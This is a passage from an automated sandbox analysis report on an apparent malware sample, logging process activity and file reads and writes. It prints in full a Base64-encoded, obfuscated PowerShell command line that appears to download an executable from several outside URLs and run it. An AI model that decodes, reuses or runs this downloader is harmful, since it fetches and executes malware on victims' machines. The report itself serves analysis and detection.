AG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArACcA dABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAKgBo ACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnACsA KAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAKwAn AGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoACcA aQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAKAAn AHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnAC8A KgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAv AHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnAG4A JwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJwBu ACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnACsA JwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAKAAn ADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArACgA JwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJwAr ACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuACcA KwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAKwAn AG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApACsA JwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAaABh AHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnACsA JwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZQBh AGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnAG8A YgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAATgBM AE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgACQA TABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAcwAn ACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuACgAJ wBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeABwA GgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1ADcAO AA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0A GUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6ADEAe QA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOwBiA HIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlACcAK wAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABEA DUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkACcAK QArACcAZwBuACcAKQA=' Imagebase: 0x1320000 File size: 232960 bytes MD5 hash: F3BDBE3BB6F734E357235F4D5898582D Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high
File Activities
Copyright null 2020 Page 12 of 16 Source File Path Access Attributes Options Completion Count Address Symbol
Analysis Process: conhost.exe PID: 6912 Parent PID: 6904
General
Start time: 15:00:47 Start date: 02/09/2020 Path: C:\Windows\System32\conhost.exe Wow64 process (32bit): false Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Imagebase: 0x7ff66fd50000 File size: 625664 bytes MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496 Has administrator privileges: false Programmed in: C, C++ or other language Reputation: high
Analysis Process: powershell.exe PID: 6956 Parent PID: 6904
General
Start time: 15:00:48 Start date: 02/09/2020 Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Wow64 process (32bit): true
Copyright null 2020 Page 13 of 16 Commandline: powersheLL -e JABFAHAAagA1ADgAOQBpAD0AKAAoACcAWABmADAAJwArA CcAaAAnACkAKwAoACcAcgAzACcAKwAnAGwAJwApACkAOwAuACgAJwBuAGUAd wAtACcAKwAnAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFUAcwBlAFIAcABSA G8AZgBpAGwARQBcAFAAUwAyADkAQgA2AEMAXABMAFMAcQAzAEIAXwBMAFwAI AAtAGkAdABlAG0AdAB5AHAAZQAgAGQASQBSAEUAYwBUAG8AUgB5ADsAWwBOA GUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAX QA6ADoAIgBTAGUAQwBVAHIASQBgAFQAeQBQAFIAYABPAHQAYABPAGMAYABvA EwAIgAgAD0AIAAoACgAJwB0AGwAcwAnACsAJwAxADIALAAnACkAKwAnACAAJ wArACcAdAAnACsAKAAnAGwAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArA CgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQASABfADgAagB0ADUAYwAgAD0AI AAoACgAJwBaACcAKwAnAHYAaAAnACkAKwAoACcANQAnACsAJwBlAGEAJwApA CsAJwBuAHYAJwApADsAJABSAF8AegBzAHYAMQBrAD0AKAAoACcAQgBjACcAK wAnAGQAdQBpACcAKQArACcAOAAnACsAJwB5ACcAKQA7ACQATABuAHgAcABoA DkAbQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJ wA1AFQAJwArACgAJwB6ACcAKwAnAFAAJwArACcAcwAyADkAYgA2AGMAJwApA CsAJwA1ACcAKwAoACcAVAB6ACcAKwAnAEwAcwAnACkAKwAoACcAcQAzACcAK wAnAGIAJwArACcAXwBsADUAVAB6ACcAKQApACAAIAAtAEMAUgBFAFAATABBA EMAZQAoACcANQBUACcAKwAnAHoAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAK wAkAEgAXwA4AGoAdAA1AGMAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlA CcAKQApADsAJABMAGIANwA4ADYAcgB5AD0AKAAoACcAVgAzACcAKwAnAHEAN AAnACkAKwAoACcAcwAyACcAKwAnAGcAJwApACkAOwAkAFMAZQA1AHoAaAB0A G0APQAmACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAK QAgAE4ARQB0AC4AdwBFAEIAYwBMAGkAZQBOAHQAOwAkAEYAaQA4AGkAZwBvA GIAPQAoACcAaAAnACsAJwB0AHQAJwArACcAcAAnACsAJwA6AC8AJwArACgAJ wAvAHIAJwArACcAdQBlACcAKQArACcAYwBrACcAKwAnAGUAcgAnACsAKAAnA HQALQAnACsAJwBvACcAKQArACgAJwBuAGwAaQBuACcAKwAnAGUAJwArACcAL gBkACcAKQArACgAJwBlAC8AJwArACcAYwBnAGkAJwApACsAJwAtAGIAJwArA CgAJwBpAG4AJwArACcALwAnACkAKwAnAEsAJwArACgAJwByACcAKwAnAGgAN wBuAHIAJwArACcAMQA5ADcAOAAnACsAJwAvACoAJwApACsAJwBoACcAKwAnA HQAdAAnACsAJwBwACcAKwAoACcAcwA6ACcAKwAnAC8AJwApACsAJwAvACcAK wAoACcAcgB1AGIAJwArACcAZQBuAHcAJwApACsAKAAnAGkAbgAnACsAJwBrA GUAbABtACcAKQArACgAJwBhAG4ALgAnACsAJwBuACcAKwAnAGwALwBjACcAK QArACcAZwBpACcAKwAnAC0AJwArACcAYgBpACcAKwAoACcAbgAvACcAKwAnA GwAVQAnACkAKwAoACcASAAnACsAJwAvACoAaAB0ACcAKQArACcAdAAnACsAK AAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAHIAdQBwAGUAcgAnA CkAKwAnAHQAJwArACgAJwBzAHQAJwArACcAcgBlACcAKQArACgAJwBlAHQAL gBkACcAKwAnAGUAJwApACsAJwAvACcAKwAnAEgAJwArACgAJwBlAGkAZABpA CcAKwAnAHMALQAnACkAKwAnAEUAJwArACgAJwB4ACcAKwAnAC8AYQB0AHQAY QAnACsAJwBjAGgALwB2ACcAKQArACcAQwAnACsAJwBGAFMAJwArACgAJwBhA GsAJwArACcAUABIAHEALwAqACcAKQArACcAaAAnACsAKAAnAHQAdABwADoAL wAvACcAKwAnAHMAYQAnACkAKwAnAG0AJwArACgAJwBhAHQAZQBjACcAKwAnA GgAJwApACsAKAAnAG4AaQBjACcAKwAnAHMAJwApACsAJwAuAGMAJwArACgAJ wBvAG0AJwArACcALwBfACcAKwAnAHMAYwByAGkAJwApACsAKAAnAHAAJwArA CcAdABzAC8ARAAnACkAKwAoACcAVwB4AGkAcAAnACsAJwB3AC8AJwArACcAK gBoACcAKQArACcAdAAnACsAKAAnAHQAJwArACcAcAA6ACcAKQArACcALwAnA CsAKAAnAC8AJwArACcAcwBjACcAKQArACcAaABhACcAKwAoACcAaQBkACcAK wAnAGwAJwApACsAKAAnAC4AZAAnACsAJwBlACcAKQArACcALwBiACcAKwAoA CcAaQBsAGQAJwArACcAZQByAC8AJwApACsAJwBrACcAKwAnAGMAMQAnACsAK AAnAHIAcwA0ACcAKwAnADcAJwArACcANAA2ACcAKQArACcANQA3ACcAKwAnA C8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJ wAvAHMAJwApACsAKAAnAGEAJwArACcAdQBlAHIAYgBlAGMAawAuACcAKwAnA G4AJwArACcAZQB0AC8AYwBnAGkALQAnACkAKwAnAGIAJwArACcAaQAnACsAJ wBuACcAKwAnAC8ATQAnACsAKAAnAFcAJwArACcAUgBPAGkAcwBHAFUARAAnA CsAJwBwACcAKwAnAEIALwAqAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACsAK AAnADoALwAvACcAKwAnAHMAJwApACsAKAAnAGMAJwArACcAaABhACcAKQArA CgAJwBlACcAKwAnAGYAZQByACcAKQArACgAJwAtAGYAJwArACcAcgBhAG4AJ wArACcAawAuAGQAJwApACsAKAAnAGUALwBjACcAKwAnAGcAaQAtAGIAaQBuA CcAKwAnAC8AYwAnACkAKwAnAGIAJwArACgAJwBqACcAKwAnADUAcgAnACkAK wAnAG4AJwArACgAJwBxAG0ANgA1ACcAKwAnAHoAJwArACcAbQA4ADMAJwApA CsAJwAxACcAKwAnADIALwAnACkALgAiAFMAYABwAEwAaQB0ACIAKABbAGMAa ABhAHIAXQA0ADIAKQA7ACQAUgB1AGgAMAB0ADQAbAA9ACgAKAAnAFIAdAAnA CsAJwBwACcAKQArACgAJwAxAGgAYgAnACsAJwAzACcAKQApADsAZgBvAHIAZ QBhAGMAaAAoACQASwBjAG8ANABsADYAOQAgAGkAbgAgACQARgBpADgAaQBnA G8AYgApAHsAdAByAHkAewAkAFMAZQA1AHoAaAB0AG0ALgAiAEQAbwBXAGAAT gBMAE8AYQBgAEQAZgBgAGkAbABFACIAKAAkAEsAYwBvADQAbAA2ADkALAAgA CQATABuAHgAcABoADkAbQApADsAJABPAHYAeQAwAHIAegBwAD0AKAAnAEkAc wAnACsAKAAnAHkAJwArACcANABrAHMAZwAnACkAKQ7AEkAZgAgACgAKAAuAC gAJwBHAGUAdAAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACAAJABMAG4AeA BwAGgAOQBtACkALgAiAEwAZQBuAGcAYABUAEgAIgAgAC0AZwBlACAAMgA1AD cAOAA2ACkAIAB7ACYAKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJw B0AGUAbQAnACkAKAAkAEwAbgB4AHAAaAA5AG0AKQA7ACQAQQA3AHoAegB6AD EAeQA9ACgAJwBMACcAKwAoACcAaQAnACsAJwBtAGIAMABfADQAJwApACkAOw BiAHIAZQBhAGsAOwAkAFUAaQA4AGQAaQB3AF8APQAoACgAJwBBAHgAYgBlAC cAKwAnAHMAZgAnACkAKwAnAGcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJA BEADUAZwBnAGMAXwA3AD0AKAAnAEEAaAAnACsAKAAnAGEAJwArACcAcQBkAC cAKQArACcAZwBuACcAKQA= Imagebase: 0x1260000 File size: 430592 bytes MD5 hash: DBA3E6449E97D4E3DF64527EF7012A10 Has administrator privileges: false Programmed in: .Net C# or VB.NET Reputation: high
File Activities
File Created Copyright null 2020 Page 14 of 16 Source File Path Access Attributes Options Completion Count Address Symbol C:\Users\user read data or list device directory file | object name collision 1 6DE0CF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Roaming read data or list device directory file | object name collision 1 6DE0CF06 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Windows\system32\catroot read data or list device directory file | object name collision 1 6C8E5B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Windows\system32\catroot2 read data or list device directory file | object name collision 1 6C8E5B28 unknown directory | synchronous io synchronize non alert | open for backup ident | open reparse point C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\Sta read attributes | device synchronous io success or wait 1 6DFD1926 CreateFileW rtupProfileData-Interactive synchronize | non alert | non generic write directory file
File Written
Source File Path Offset Length Value Ascii Completion Count Address Symbol C:\Users\user\AppData\Local\Mi unknown 64 40 00 00 01 65 00 00 @...e...... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 0a 00 ...... 00 00 05 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C:\Users\user\AppData\Local\Mi unknown 40 48 00 00 02 03 00 00 H...... <@.^...L."My.. success or wait 10 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 00 00 00 00 01 00 .:...... 00 00 3c 40 b0 5e e7 8d bf 4c b2 22 4d 79 98 9c a7 3a 03 00 00 00 0e 00 20 00 C:\Users\user\AppData\Local\Mi unknown 32 4d 69 63 72 6f 73 6f Microsoft.PowerShell.Cons success or wait 10 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 66 74 2e 50 6f 77 65 oleHost 72 53 68 65 6c 6c 2e 43 6f 6e 73 6f 6c 65 48 6f 73 74 C:\Users\user\AppData\Local\Mi unknown 1 00 . success or wait 7 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 4 40 00 00 03 @... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive C:\Users\user\AppData\Local\Mi unknown 60 00 0e 80 00 01 0e 80 ...... success or wait 1 6E0D76FC WriteFile crosoft\Windows\PowerShell\StartupProfileData-Interactive 00 02 0e 80 00 03 0e ...... T.@..>@.G.@...@.. 80 00 04 0e 80 00 05 @@. 0e 80 00 06 0e 80 00 07 0e 80 00 08 0e 80 00 09 0c 80 00 54 01 40 00 f9 3e 40 01 47 01 40 00 da 00 40 00 0e 40 40 01
File Read
Source File Path Offset Length Completion Count Address Symbol C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6DDE5705 unknown
Copyright null 2020 Page 15 of 16 Source File Path Offset Length Completion Count Address Symbol C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDE5705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152 unknown 176 success or wait 1 6DD403DE ReadFile fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDECA54 ReadFile C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 1 6DDECA54 ReadFile C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDECA54 ReadFile C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f unknown 900 success or wait 1 6DD403DE ReadFile 1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7e unknown 620 success or wait 1 6DD403DE ReadFile efa3cd3e0ba98b5ebddbbc72e6\System.ni.dll.aux C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config unknown 8173 end of file 1 6DDE5705 unknown C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b2 unknown 748 success or wait 1 6DD403DE ReadFile 19d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll.aux C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf4 unknown 748 success or wait 1 6DD403DE ReadFile 9f6405#\ccc7c82770f93d1392abde4be3a80378\Microsoft.Management.Infrastructure.ni.dll.aux C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4097 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4098 success or wait 2 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 7976 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4121 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4253 success or wait 1 6DDE5705 unknown C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 8171 end of file 1 6DDE5705 unknown
Disassembly
Copyright null 2020 Page 16 of 16